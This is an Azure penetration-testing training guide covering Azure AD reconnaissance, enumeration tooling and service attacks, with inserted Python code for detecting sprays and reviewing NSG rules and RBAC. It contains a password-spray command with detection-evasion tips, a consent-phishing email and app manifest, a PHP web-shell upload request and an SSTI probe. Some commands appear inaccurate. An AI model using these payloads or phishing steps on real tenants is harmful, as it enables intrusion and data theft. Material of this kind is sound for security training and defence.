Azure Pentesting
Learning Objective 1 - Information Gathering on Azure AD
- Tool Used: AADInternals
- Purpose:
- To gather foundational information about the target organization's Azure Active Directory (Azure AD) environment.
- General Tasks:
- Verify the presence and usage of Azure AD within the target organization.
- Identify the Azure AD Tenant ID, which is crucial for further targeted attacks or assessments.
- Validate and enumerate email IDs associated with the organization's domain.
- Discover Azure Services being utilized by the organization to plan subsequent penetration testing steps.
- General Commands and Techniques:
# Import the AADInternals module, assuming it's installed in the default directory
Import-Module C:\Path\To\AADInternals\AADInternals.psd1
# Retrieve login information for a suspected user or a generic user if unknown
Get-AADIntLoginInformation -UserName example@targetdomain.com
# Acquire the Tenant ID using the organization's domain
Get-AADIntTenantID -Domain targetdomain.com
- Use tools like o365creeper to validate and scrape email IDs which can be useful for crafting phishing campaigns or brute-force attacks.
- Utilize MicroBurst or similar tools to enumerate Azure services, gaining insights into potential points of vulnerability or valuable targets within the Azure environment.
This generalized approach ensures that the penetration tester has the necessary initial insights to effectively assess the security posture of an organization's Azure AD setup, guiding further specific testing activities.
Learning Objective 2 - Brute Force and Azure Portal Enumeration
- Tool Used: MSOLSpray
- Purpose:
- To perform a controlled brute-force attack on identified user accounts within the target organization's Azure AD to validate credentials.
- To enumerate vital Azure AD components through the Azure Portal once access is gained.
- General Tasks:
- Execute a password spray attack against a list of known or guessed user emails to find valid credentials.
- Once credentials are obtained, log into the Azure portal to gather detailed information on users, groups, devices, directory roles, and enterprise applications.
- General Commands and Techniques:
# Use MSOLSpray to perform a password spray attack
Invoke-MSOLSpray -UserList C:\Path\To\useremails.txt -Password GuessThis!123
# Log in to the Azure portal using valid credentials
# Navigate to https://portal.azure.com and authenticate using the obtained credentials
- **Brute Force Tips:**
- Use a common password across all users to avoid account lockouts.
- Target non-peak hours for the attack to reduce the chance of detection.
- **Azure Portal Enumeration Tips:**
- After gaining access, explore the Azure Active Directory section in the portal to review:
- Users and their roles
- Group memberships and associated permissions
- Registered devices and their compliance status
- Roles assigned within Azure AD and any custom administrative roles
- Enterprise applications and their configurations, permissions, and associated users/groups
This approach equips the penetration tester with a method to gain initial footholds within an organization’s Azure environment and subsequently leverage this access to perform comprehensive enumeration, crucial for deeper security assessments.
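The spray described above is low-and-slow per account but wide across accounts, so detection keys on distinct users failing from one source rather than on per-user failure counts. The following is an added defender-side example, not code from the original notes: it assumes sign-in records shaped like the Microsoft Graph signIn resource (userPrincipalName, ipAddress, createdDateTime, status.errorCode) and runs over constructed sample records.

```python
"""Detect password-spray patterns in Entra ID / Azure AD sign-in log records.

Added example (not from the original notes). Records follow the shape of the
Microsoft Graph signIn resource; the sample below is constructed. Error code
50126 ("invalid username or password") is what one password tried across many
accounts produces in bulk, while each account sees only one or two failures.
"""
from collections import defaultdict
from datetime import datetime, timedelta

INVALID_CREDENTIALS = 50126
SUCCESS = 0


def _rec(upn, ip, ts, code):
    return {"userPrincipalName": upn, "ipAddress": ip,
            "createdDateTime": ts, "status": {"errorCode": code}}


# Constructed sample: one source IP fails once each against five accounts and
# then succeeds for one of them; a second IP shows an ordinary user typo.
SAMPLE_SIGNINS = [
    _rec("alice@targetdomain.com", "203.0.113.7", "2024-05-01T02:10:00Z", 50126),
    _rec("bob@targetdomain.com", "203.0.113.7", "2024-05-01T02:11:00Z", 50126),
    _rec("carol@targetdomain.com", "203.0.113.7", "2024-05-01T02:12:00Z", 50126),
    _rec("dave@targetdomain.com", "203.0.113.7", "2024-05-01T02:13:00Z", 50126),
    _rec("erin@targetdomain.com", "203.0.113.7", "2024-05-01T02:14:00Z", 50126),
    _rec("dave@targetdomain.com", "203.0.113.7", "2024-05-01T02:20:00Z", 0),
    _rec("alice@targetdomain.com", "198.51.100.9", "2024-05-01T09:00:00Z", 50126),
    _rec("alice@targetdomain.com", "198.51.100.9", "2024-05-01T09:01:00Z", 50126),
    _rec("alice@targetdomain.com", "198.51.100.9", "2024-05-01T09:02:00Z", 0),
]


def parse_time(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def find_spray_sources(signins, window=timedelta(minutes=60), min_distinct_users=5):
    """Return {ip: {"distinct_users": n, "hits": [upn, ...]}} for every source IP
    that produced invalid-credential failures for at least `min_distinct_users`
    distinct accounts inside any `window`-long span. `hits` lists accounts that
    later signed in successfully from the same IP (a likely guessed password)."""
    by_ip = defaultdict(list)
    for rec in signins:
        by_ip[rec["ipAddress"]].append(
            (parse_time(rec["createdDateTime"]), rec["userPrincipalName"],
             rec["status"]["errorCode"]))

    findings = {}
    for ip, events in by_ip.items():
        events.sort()
        failures = [(t, u) for t, u, code in events if code == INVALID_CREDENTIALS]
        # Sliding window over time-ordered failures: widest set of distinct users.
        best, start = 0, 0
        for end in range(len(failures)):
            while failures[end][0] - failures[start][0] > window:
                start += 1
            best = max(best, len({u for _, u in failures[start:end + 1]}))
        if best < min_distinct_users:
            continue
        first_fail = {}
        for t, u in failures:
            first_fail.setdefault(u, t)
        hits = sorted({u for t, u, code in events
                       if code == SUCCESS and u in first_fail and t >= first_fail[u]})
        findings[ip] = {"distinct_users": best, "hits": hits}
    return findings


if __name__ == "__main__":
    for ip, info in find_spray_sources(SAMPLE_SIGNINS).items():
        print(f"{ip}: {info['distinct_users']} accounts targeted, hits={info['hits']}")
```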
Learning Objective 3 - PowerShell Enumeration of Azure AD
- Tools Used: AzureAD PowerShell Module
- Purpose:
- To leverage PowerShell for deep enumeration of Azure AD elements, gaining insights into users, groups, devices, and roles within the target organization.
- General Tasks:
- Connect to Azure AD using PowerShell to pull comprehensive information about the organizational structure and security posture.
- Enumerate details about users, groups, devices, directory roles, and enterprise applications using AzureAD PowerShell commands.
- General Commands and Techniques:
# Connect to Azure AD with credentials
Import-Module AzureAD
$UserCredential = Get-Credential
Connect-AzureAD -Credential $UserCredential
# Enumerate all users
Get-AzureADUser -All $true
# Enumerate all groups
Get-AzureADGroup -All $true
# Enumerate all registered devices
Get-AzureADDevice -All $true
- **Detailed Commands:**
- To pull detailed attributes of users or specific filtering:
`Get-AzureADUser -All $true | Select DisplayName, UserPrincipalName, ObjectId`
- For groups, to get members and their roles:
`Get-AzureADGroupMember -ObjectId <GroupObjectId>`
- For directory roles, particularly to identify global administrators:
`Get-AzureADDirectoryRole | Where-Object {$_.DisplayName -eq "Global Administrator"}`
`Get-AzureADDirectoryRoleMember -ObjectId <RoleId>`
This methodology provides a systematic approach for security professionals to scrutinize the Azure AD setup through PowerShell, allowing for targeted and effective penetration testing maneuvers based on discovered configurations and roles.
Learning Objective 4 - Using Az PowerShell for Resource Enumeration
- Tool Used: Az PowerShell Module
- Purpose:
- To utilize the Az PowerShell module for comprehensive enumeration of Azure resources, which is essential for understanding the scope of assets and services deployed by the target organization.
- General Tasks:
- Authenticate and connect to the Azure environment to enumerate resources such as virtual machines, app services, storage accounts, and role assignments.
- General Commands and Techniques:
# Authenticate and connect to Azure
Connect-AzAccount
# List all Azure virtual machines
Get-AzVM
# List all app services
Get-AzWebApp
# List all role assignments
Get-AzRoleAssignment
# Enumerate storage accounts
Get-AzStorageAccount
- **Detailed Commands:**
- For a detailed view of specific resource groups or to filter resources by location:
`Get-AzResourceGroup | Where-Object {$_.Location -eq "East US"}`
`Get-AzVM -ResourceGroupName "YourResourceGroupName"`
- To review the network security groups and their rules:
`Get-AzNetworkSecurityGroup | Select-Object Name, SecurityRules`
- For deeper insights into managed identities and their permissions:
`Get-AzUserAssignedIdentity`
This objective equips the penetration tester with the tools and commands needed to explore Azure resources in depth, offering insights into the deployment architecture and potential security weak points that could be exploited during a pen test.
Learning Objective 5 - AZ CLI for Azure Resource Enumeration
- Tool Used: Azure Command Line Interface (AZ CLI)
- Purpose:
- To leverage the Azure Command Line Interface for querying and managing Azure services directly from the command line, providing a powerful way to access a wide array of Azure services efficiently.
- General Tasks:
- Authenticate to Azure using the CLI and enumerate resources such as virtual machines, web apps, and storage accounts to uncover their configurations and security postures.
- General Commands and Techniques:
# Log in to Azure
az login -u username@domain.com -p YourPassword
# List all virtual machines in all resource groups
az vm list --output table
# List all Azure web apps
az webapp list --output table
# Get details about storage accounts
az storage account list --output table
- **Detailed Commands:**
- To view details about specific resources or to filter them by tags or other attributes:
`az vm show --name VMName --resource-group ResourceGroupName`
`az webapp show --name AppName --resource-group ResourceGroupName`
- To inspect network interfaces and their associated public IP addresses:
`az network nic list --query "[].{Name:name, IP:ipConfigurations[0].publicIpAddress.id}"`
- For checking compliance and policies applied to resources:
`az policy assignment list --output table`
This setup equips penetration testers with the capability to perform quick and extensive reconnaissance of Azure resources using the CLI, which is crucial for identifying misconfigurations and potential security vulnerabilities that can be targeted during assessments.
Learning Objective 6 - ROADTools for Advanced Enumeration
- Tool Used: ROADTools
- Purpose:
- To use ROADTools, a suite of Python tools for interacting with Azure AD, to gain insights into Azure AD structures and permissions that are typically harder to visualize or access via standard tools.
- General Tasks:
- Utilize ROADTools to enumerate detailed information about Azure AD tenants, including application roles, permissions, and service principals.
- General Commands and Techniques:
# Set up ROADTools
python3 -m pip install roadtools roadlib
# Authenticate to Azure AD and collect the tenant data with ROADRecon
roadrecon auth
roadrecon gather
# Explore the tenant's roles, permissions, and configurations; this opens a web interface to interactively query the collected Azure AD data
roadrecon gui
- **Detailed Use Cases:**
- Identify misconfigured application permissions that could allow escalation of privileges.
- Find service principals with high-level permissions and assess their access controls.
- Visualize relationships and dependencies within Azure AD to identify potential attack paths.
This objective guides penetration testers on using advanced tools like ROADTools to dive deeper into the Azure AD architecture, uncovering nuanced details that can highlight critical security gaps or misconfigurations. This insight is vital for comprehensive Azure security assessments.
Learning Objective 7 - StormSpotter for Visualizing Azure AD
- Tool Used: StormSpotter
- Purpose:
- To utilize StormSpotter, a tool designed to collect and visualize Azure AD and Azure resources, helping to understand complex relationships and configurations that could impact security.
- General Tasks:
- Use StormSpotter to map out the Azure AD landscape, including relationships between users, groups, applications, and service principals.
- General Commands and Techniques:
# Set up StormSpotter
git clone https://github.com/Azure/Stormspotter
cd Stormspotter
az login
python3 -m venv ssenv
source ssenv/bin/activate
pip install -r requirements.txt
python3 stormspotter.py --collect
# After collection, use the StormSpotter dashboard to visualize the data
- **Detailed Use Cases:**
- Identify overly permissive relationships between users and critical resources.
- Visualize service principal connections and their permissions to assess risk levels.
- Detect unusual patterns or configurations that deviate from best practices.
This objective helps penetration testers and security analysts visualize and analyze Azure environments in a structured and graphical manner, providing clear insights into potential security weaknesses and the overall security posture of Azure deployments.
Learning Objective 8 - BloodHound for Azure AD Analysis
- Tool Used: BloodHound
- Purpose:
- To employ BloodHound, a powerful tool for analyzing trust relationships within an Active Directory (AD) environment, adapted for Azure AD to identify paths that attackers might exploit to gain escalated privileges.
- General Tasks:
- Utilize BloodHound with its Azure AD ingestor to collect and analyze data regarding Azure AD components such as users, groups, and roles.
- General Commands and Techniques:
# Set up BloodHound with the Azure AD ingestor
git clone https://github.com/BloodHoundAD/BloodHound.git
cd BloodHound
# Use SharpHound to collect data from Azure AD
Invoke-BloodHound -CollectionMethod All -Domain targetdomain.com -JSONFolder path/to/output
# Analyze data in the BloodHound GUI
# Launch the BloodHound GUI and import the JSON data collected
- **Detailed Use Cases:**
- Map out user permissions and group memberships to identify potential privilege escalation paths.
- Analyze trust relationships between users, groups, and computers to find the shortest path to high-value targets.
- Examine effective permissions and group policies that apply to critical assets to ensure there are no unintended access rights.
This objective equips penetration testers with the means to perform an in-depth assessment of Azure AD using BloodHound, identifying critical pathways and relationships that could be exploited in an attack scenario. This analysis is crucial for understanding how an attacker might navigate an Azure AD environment to escalate privileges or access sensitive information.
Learning Objective 9 - Illicit Consent Grant Attack
- Purpose:
- To execute an illicit consent grant attack, which exploits the OAuth consent framework in Azure AD, allowing attackers to obtain access to user data without the user’s direct credentials.
- General Tasks:
- Create a malicious Azure AD application that requests permissions beyond what is necessary, tricking a user into granting those permissions.
- Use phishing techniques to persuade users to grant consent to the malicious application.
- General Commands and Techniques:
# Register a new Azure AD application
az ad app create --display-name "TrustedApp" --reply-urls "http://localhost/myapp" --required-resource-accesses @manifest.json
# Example manifest.json for requesting permissions
[
  {
    "resourceAppId": "00000003-0000-0000-c000-000000000000",
    "resourceAccess": [
      {
        "id": "e1fe6dd8-ba31-4d61-89e7-88639da4683d",
        "type": "Scope"
      }
    ]
  }
]
# Phishing email example
Subject: New Required Application for All Users
Body: Please authorize the new application to enhance your productivity. Click here: [Authorization Link]
- **Detailed Use Cases:**
- After obtaining consent, the malicious app can access user data as per the granted permissions, which could include reading emails, accessing documents, and more.
- The attacker can automate the access to exfiltrate data or manipulate services within the victim’s environment.
This objective highlights a sophisticated method of attack that bypasses traditional authentication mechanisms by abusing the OAuth consent framework. Penetration testers can use this technique to demonstrate the potential risks of consent phishing and the importance of implementing strict controls on application permissions within Azure AD.
Learning Objective 10 - Compromise via Insecure File Upload
- Purpose:
- To exploit insecure file upload mechanisms within Azure App Services to gain unauthorized access or execute arbitrary code on the server.
- General Tasks:
- Identify and exploit file upload vulnerabilities in web applications hosted on Azure App Services that allow the uploading and execution of malicious files.
- General Commands and Techniques:
# Example of exploiting a file upload form
POST /upload HTTP/1.1
Host: vulnerable-app.azurewebsites.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: length

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/x-php

<?php echo shell_exec($_GET['cmd']); ?>
------WebKitFormBoundary--
- **Detailed Use Cases:**
- Check if the server improperly handles file types, allowing for the upload of scripts or executables.
- After uploading, access the uploaded file via a direct URL to execute the script, potentially gaining remote code execution or other malicious outcomes.
- Assess the permissions associated with the service principal linked to the App Service to understand the potential impact of the compromise.
This objective demonstrates how a seemingly simple vulnerability can lead to significant security breaches, particularly in cloud environments where multiple services and applications are interconnected. It underscores the importance of securing file upload functionalities and regularly auditing the security configuration of cloud-hosted applications.
Learning Objective 11 - SSTI in Azure App Services
- Purpose:
- To identify and exploit Server-Side Template Injection (SSTI) vulnerabilities within applications hosted on Azure App Services, potentially leading to Remote Code Execution (RCE).
- General Tasks:
- Discover template injection points within application pages and attempt to inject template syntax that can be processed by the server.
- General Commands and Techniques:
# Example of exploiting SSTI by injecting template syntax
POST /page HTTP/1.1
Host: vulnerable-app.azurewebsites.net
Content-Type: application/x-www-form-urlencoded
Content-Length: length

input={{7*'7'}}
# This will output '49' if the server processes it as a template
- **Detailed Use Cases:**
- Exploit template engines like Jinja2 or Twig by injecting code that performs operations not intended by the developer, such as accessing environment variables or executing shell commands.
- Use discovered vulnerabilities to gain insights into the server's environment or elevate privileges.
Learning Objective 12 - Attacking Azure Functions
- Purpose:
- To exploit vulnerabilities in Azure Functions, such as insecure configurations or exposed sensitive information, for unauthorized access or data exfiltration.
- General Tasks:
- Enumerate Azure Functions within the target environment and identify misconfigurations or security flaws.
- General Commands and Techniques:
# Example command to list Azure Functions
az functionapp list --query "[].{Name:name, ResourceGroup:resourceGroup}"
- **Detailed Use Cases:**
- Inspect Azure Functions for weak authentication methods or exposed administrative interfaces.
- Examine the function code for secrets or keys stored in plaintext which could be used to access other Azure services.
Learning Objective 13 - Exploiting Azure Logic Apps
- Purpose:
- To identify and exploit vulnerabilities in Azure Logic Apps that could lead to unauthorized actions being triggered or data being leaked.
- General Tasks:
- Analyze the Logic Apps for insecure triggers or actions that could be manipulated by an attacker.
- General Commands and Techniques:
# Example command to retrieve details about Logic Apps
az logicapp action list --resource-group YourResourceGroup --name YourLogicAppName
- **Detailed Use Cases:**
- Manipulate Logic Apps to trigger unintended workflows or exfiltrate data via misconfigured actions.
- Check for the inappropriate exposure of sensitive data through logging or notifications.
Learning Objective 14 - Azure Key Vault Penetration Testing
- Purpose:
- To test Azure Key Vault for vulnerabilities that could allow unauthorized access to stored secrets, keys, or certificates.
- General Tasks:
- Attempt to access Key Vault resources without proper permissions and exploit common configuration errors.
- General Commands and Techniques:
# Example command to list Key Vaults and their properties
az keyvault list --output table
- **Detailed Use Cases:**
- Test access controls on Key Vaults to ensure that only authorized users and applications can retrieve stored secrets.
- Explore backup and recovery procedures to check for vulnerabilities that could be exploited to access Key Vault contents without direct permissions.
Learning Objective 15 - Azure Active Directory B2C Security Testing
- Purpose:
- To evaluate the security of Azure Active Directory B2C, focusing on custom policies, user flows, and external identities management.
- General Tasks:
- Assess the configuration and implementation of Azure AD B2C for weaknesses that could be exploited to compromise user identities or manipulate authentication flows.
- General Commands and Techniques:
# Example command to list all B2C policies
az ad b2c policy list --output table
- **Detailed Use Cases:**
- Analyze custom user flows and policies for vulnerabilities that could allow account takeover or unauthorized access.
- Investigate the integration of external identity providers for security flaws that could be used to bypass authentication mechanisms.
These objectives provide a comprehensive guide to advanced Azure AD penetration testing, detailing specific tactics and strategies for exploiting common and complex vulnerabilities within the Azure ecosystem.
Learning Objective 16 - Azure Container Instances Security Assessment
- Purpose:
- To assess the security posture of Azure Container Instances, focusing on container configurations, network policies, and potential vulnerabilities.
- General Tasks:
- Identify and evaluate the deployment configurations of Azure Container Instances for misconfigurations and vulnerabilities that may lead to unauthorized access or data leakage.
- General Commands and Techniques:
# List all Azure Container Instances and their properties
az container list --output table
- **Additional Details:**
- Review the network configurations and environment variables of container instances to ensure they do not expose sensitive information.
- Examine the permissions assigned to the containers to ensure they are operating under the principle of least privilege.
Learning Objective 17 - Azure Service Bus Security Testing
- Purpose:
- To evaluate the security of Azure Service Bus by testing for misconfigurations, unauthorized access, and insecure integration with other services.
- General Tasks:
- Perform tests on Azure Service Bus namespaces, queues, and topics to identify and exploit configuration flaws or improper access controls.
- General Commands and Techniques:
# Retrieve details about Service Bus namespaces
az servicebus namespace list --query "[].{Name:name, Location:location}"
- **Additional Details:**
- Check for overly permissive shared access policies that could allow unauthorized message publishing or consumption.
- Assess the encryption and access policies for queues and topics to prevent data exfiltration.
Learning Objective 18 - Azure Event Hubs Security Analysis
- Purpose:
- To analyze Azure Event Hubs for security vulnerabilities that could allow unauthorized event injection, data leakage, or service disruption.
- General Tasks:
- Inspect the configuration and access controls of Event Hubs to ensure that data streams are secure and only accessible by authorized entities.
- General Commands and Techniques:
# List all Event Hubs and their associated entities
az eventhubs namespace list --output table
- **Additional Details:**
- Verify that network rules and firewall settings are configured to limit access to trusted sources.
- Analyze consumer groups for unauthorized access that could lead to data leakage.
Learning Objective 19 - Azure SQL Database Penetration Testing
- Purpose:
- To conduct penetration tests on Azure SQL Database to identify SQL injection vulnerabilities, misconfigurations, and inadequate access controls.
- General Tasks:
- Explore Azure SQL Databases for potential SQL injection points, improper database configurations, and weak authentication practices.
- General Commands and Techniques:
# Query information about SQL databases, their configurations, and firewall rules
az sql db list --resource-group YourResourceGroup --server YourSqlServerName --output table
- **Additional Details:**
- Test for SQL injection vulnerabilities using both manual and automated tools to ensure database queries are properly sanitized.
- Examine firewall rules and virtual network configurations to ensure they do not allow access from unauthorized networks.
Learning Objective 20 - Security Assessment of Azure Logic Apps
- Purpose:
- To perform security assessments on Azure Logic Apps to uncover insecure triggers, actions, and potential abuse scenarios.
- General Tasks:
- Analyze Logic Apps for security weaknesses in the workflows, especially focusing on external triggers and actions that interact with sensitive data.
- General Commands and Techniques:
# Detailed review of Logic Apps configurations and connections
az logicapp action list --resource-group YourResourceGroup --name YourLogicAppName
- **Additional Details:**
- Inspect Logic Apps for usage of default credentials or inappropriate exposure of sensitive information within actions or triggers.
- Evaluate the security of connections used by Logic Apps to integrate with other Azure services or external applications.
These objectives extend the penetration testing framework into specialized Azure services, providing detailed techniques and commands to effectively assess and ensure their security.
Learning Objective 21 - Azure Active Directory Conditional Access Policy Assessment
- Purpose:
- To evaluate the effectiveness and security implications of Conditional Access policies applied within Azure Active Directory.
- General Tasks:
- Review and test Conditional Access policies to ensure they effectively mitigate unauthorized access and align with the organization's security policies.
- General Commands and Techniques:
# List all Conditional Access policies via Microsoft Graph (az ad sp list returns service principals, not policies; the caller needs Policy.Read.All)
az rest --method GET --url "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies"
- **Additional Details:**
- Examine the conditions and controls applied by the policies, such as user location, device state, and authentication challenges.
- Simulate scenarios to validate the enforcement of these policies under various conditions, ensuring they function as intended without introducing security risks.
Learning Objective 22 - Azure Network Security Group (NSG) Rules Review
- Purpose:
- To audit and test Azure Network Security Group (NSG) rules to identify overly permissive or conflicting rules that could expose Azure resources to attacks.
- General Tasks:
- Perform a detailed review of NSG rules applied to Azure virtual networks and subnets.
- General Commands and Techniques:
# Display NSG rules for a specific network security group
az network nsg rule list --nsg-name YourNSGName --resource-group YourResourceGroup
- **Additional Details:**
- Check for rules that allow inbound traffic from the internet to sensitive ports or services.
- Assess the order and priority of NSG rules to ensure that security policies are enforced as expected.
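Rule order matters because Azure processes NSG rules from the lowest priority number upward and stops at the first match, so an allow at 110 silently shadows a deny at 200. The following added example (not code from the original notes) evaluates that effective decision for the sensitive ports above; it assumes rule objects in the shape of `az network nsg rule list -o json` and uses constructed rules, including the platform's default DenyAllInBound at priority 65500.

```python
"""Effective inbound decision of NSG rules, evaluated in priority order.

Added example, not from the original notes. Rules mirror the fields of
`az network nsg rule list -o json` (name, priority, direction, access, protocol,
sourceAddressPrefix[es], destinationPortRange[s]); all rules are constructed.
"""
INTERNET_SOURCES = {"*", "internet", "0.0.0.0/0"}
SENSITIVE_PORTS = {22: "SSH", 3389: "RDP", 1433: "MSSQL", 445: "SMB", 5985: "WinRM"}

SAMPLE_RULES = [  # constructed
    {"name": "deny-rdp-internet", "priority": 100, "direction": "Inbound", "access": "Deny",
     "protocol": "Tcp", "sourceAddressPrefix": "Internet", "destinationPortRange": "3389"},
    {"name": "allow-mgmt", "priority": 110, "direction": "Inbound", "access": "Allow",
     "protocol": "*", "sourceAddressPrefix": "*",
     "destinationPortRanges": ["22", "3389", "5985-5986"]},
    {"name": "deny-ssh-internet", "priority": 200, "direction": "Inbound", "access": "Deny",
     "protocol": "Tcp", "sourceAddressPrefix": "0.0.0.0/0", "destinationPortRange": "22"},
    {"name": "allow-sql-office", "priority": 300, "direction": "Inbound", "access": "Allow",
     "protocol": "Tcp", "sourceAddressPrefix": "198.51.100.0/24", "destinationPortRange": "1433"},
    {"name": "DenyAllInBound", "priority": 65500, "direction": "Inbound", "access": "Deny",
     "protocol": "*", "sourceAddressPrefix": "*", "destinationPortRange": "*"},
]


def port_ranges(rule):
    """Normalise destinationPortRange / destinationPortRanges to (lo, hi) tuples."""
    raw = rule.get("destinationPortRanges") or [rule.get("destinationPortRange", "*")]
    ranges = []
    for item in raw:
        if item == "*":
            ranges.append((0, 65535))
        elif "-" in item:
            lo, hi = item.split("-")
            ranges.append((int(lo), int(hi)))
        else:
            ranges.append((int(item), int(item)))
    return ranges


def rule_matches(rule, port, protocol="Tcp"):
    if rule["direction"] != "Inbound" or rule["protocol"] not in ("*", protocol):
        return False
    return any(lo <= port <= hi for lo, hi in port_ranges(rule))


def is_internet_source(rule):
    """True when the rule's source covers an arbitrary internet host. A specific
    prefix or another service tag (e.g. VirtualNetwork) does not."""
    prefixes = rule.get("sourceAddressPrefixes") or [rule.get("sourceAddressPrefix", "*")]
    return any(p.lower() in INTERNET_SOURCES for p in prefixes)


def effective_decision(rules, port, from_internet=True):
    """Return (access, rule_name) of the first matching rule in priority order.
    With from_internet=True, only rules whose source covers the internet count,
    i.e. the decision an arbitrary external host would receive."""
    for rule in sorted(rules, key=lambda r: r["priority"]):
        if not rule_matches(rule, port):
            continue
        if from_internet and not is_internet_source(rule):
            continue
        return rule["access"], rule["name"]
    return "Deny", "(implicit)"


def internet_exposed_ports(rules):
    """Map each sensitive port reachable from the internet to the allowing rule."""
    exposed = {}
    for port, service in SENSITIVE_PORTS.items():
        access, name = effective_decision(rules, port)
        if access == "Allow":
            exposed[f"{port}/{service}"] = name
    return exposed


if __name__ == "__main__":
    for port_service, rule_name in internet_exposed_ports(SAMPLE_RULES).items():
        print(f"{port_service} open to the internet via rule '{rule_name}'")
```

In the sample, deny-ssh-internet at priority 200 never takes effect because allow-mgmt at 110 already matches port 22 from any source.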
Learning Objective 23 - Azure Subscription and Resource Group Security Review
- Purpose:
- To conduct security reviews of Azure Subscriptions and Resource Groups to ensure that administrative permissions and resource configurations adhere to security best practices.
- General Tasks:
- Audit roles and permissions assigned to Azure Subscriptions and Resource Groups.
- General Commands and Techniques:
# List roles and permissions for a specific subscription
az role assignment list --subscription YourSubscriptionId
- **Additional Details:**
- Verify that only necessary permissions are granted to users and groups to minimize the risk of privilege escalation.
- Ensure that resource locks and policies are in place to prevent unauthorized changes or deletions.
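Azure RBAC inherits downward, so an Owner granted at the subscription applies to every resource group beneath it and will not appear in a listing scoped to that group alone. The following added example (not code from the original notes) resolves the effective privileged roles at a target scope and lists least-privilege red flags; it assumes assignment objects shaped like `az role assignment list --all -o json` and uses constructed assignments with a placeholder subscription id.

```python
"""Resolve effective privileged Azure RBAC roles at a scope, including inheritance.

Added example, not part of the original notes. Assignments mirror the fields of
`az role assignment list --all -o json` (principalName, principalType,
roleDefinitionName, scope); the assignments and subscription id are constructed.
"""
PRIVILEGED_ROLES = {"Owner", "Contributor", "User Access Administrator"}
SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"  # placeholder id

SAMPLE_ASSIGNMENTS = [  # constructed
    {"principalName": "alice@targetdomain.com", "principalType": "User",
     "roleDefinitionName": "Owner", "scope": SUB},
    {"principalName": "bob@targetdomain.com", "principalType": "User",
     "roleDefinitionName": "Reader", "scope": SUB},
    {"principalName": "build-pipeline-sp", "principalType": "ServicePrincipal",
     "roleDefinitionName": "Contributor", "scope": SUB + "/resourceGroups/prod-rg"},
    {"principalName": "dev-team", "principalType": "Group",
     "roleDefinitionName": "Owner", "scope": SUB + "/resourceGroups/dev-rg"},
    {"principalName": "carol@targetdomain.com", "principalType": "User",
     "roleDefinitionName": "Virtual Machine Contributor",
     "scope": SUB + "/resourceGroups/prod-rg/providers/Microsoft.Compute/virtualMachines/web01"},
]


def scope_covers(assigned_scope, target_scope):
    """True when an assignment at `assigned_scope` applies to `target_scope`:
    the same scope or any descendant (case-insensitive, like Azure)."""
    a = assigned_scope.lower().rstrip("/")
    t = target_scope.lower().rstrip("/")
    return t == a or t.startswith(a + "/")


def effective_roles(assignments, target_scope):
    """Map principal name -> sorted role names that apply at target_scope."""
    roles = {}
    for asg in assignments:
        if scope_covers(asg["scope"], target_scope):
            roles.setdefault(asg["principalName"], set()).add(asg["roleDefinitionName"])
    return {p: sorted(r) for p, r in roles.items()}


def privileged_principals(assignments, target_scope):
    """Principals holding Owner/Contributor/User Access Administrator at
    target_scope, whether assigned there or inherited from an ancestor."""
    return {p: [r for r in roles if r in PRIVILEGED_ROLES]
            for p, roles in effective_roles(assignments, target_scope).items()
            if PRIVILEGED_ROLES & set(roles)}


def review_findings(assignments):
    """Least-privilege red flags: privileged roles at subscription scope and
    privileged roles held by service principals (non-interactive identities)."""
    findings = []
    for asg in assignments:
        role = asg["roleDefinitionName"]
        if role not in PRIVILEGED_ROLES:
            continue
        if asg["scope"].count("/") == 2:  # exactly /subscriptions/<id>
            findings.append(f"{asg['principalName']}: {role} at subscription scope")
        if asg["principalType"] == "ServicePrincipal":
            findings.append(f"{asg['principalName']}: service principal holds {role} on {asg['scope']}")
    return findings


if __name__ == "__main__":
    print(privileged_principals(SAMPLE_ASSIGNMENTS, SUB + "/resourceGroups/prod-rg"))
    for line in review_findings(SAMPLE_ASSIGNMENTS):
        print("finding:", line)
```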
Learning Objective 24 - Azure App Configuration and App Service Environment Security Testing
- Purpose:
- To test the security of Azure App Configuration and App Service Environments, focusing on authentication mechanisms, configuration settings, and potential vulnerabilities.
- General Tasks:
- Identify and exploit weaknesses in Azure App Configuration and App Service Environments.
- General Commands and Techniques:
# Retrieve configuration settings and connection strings
az appconfig kv list --name YourAppConfigName --resource-group YourResourceGroup
- **Additional Details:**
- Test for insecure default configurations that might allow unauthorized access or data leakage.
- Explore custom domain configurations and TLS settings to ensure they are secure against man-in-the-middle attacks.
Learning Objective 25 - Comprehensive Azure Security Best Practices Review
- Purpose:
- To consolidate findings from the penetration testing efforts and review them against Azure security best practices and compliance requirements.
- General Tasks:
- Compile security testing results, identify patterns of misconfigurations, and recommend remediations based on Azure security best practices.
- General Commands and Techniques:
# General review of security health
az security assessment list
- **Additional Details:**
- Utilize Azure Security Center to get insights into security posture and potential vulnerabilities.
- Compare findings with industry standards like CIS Benchmarks and ensure compliance with regulatory requirements.
These objectives round out the extensive penetration testing and security review efforts across various Azure services and configurations, providing a thorough and in-depth approach to securing Azure environments.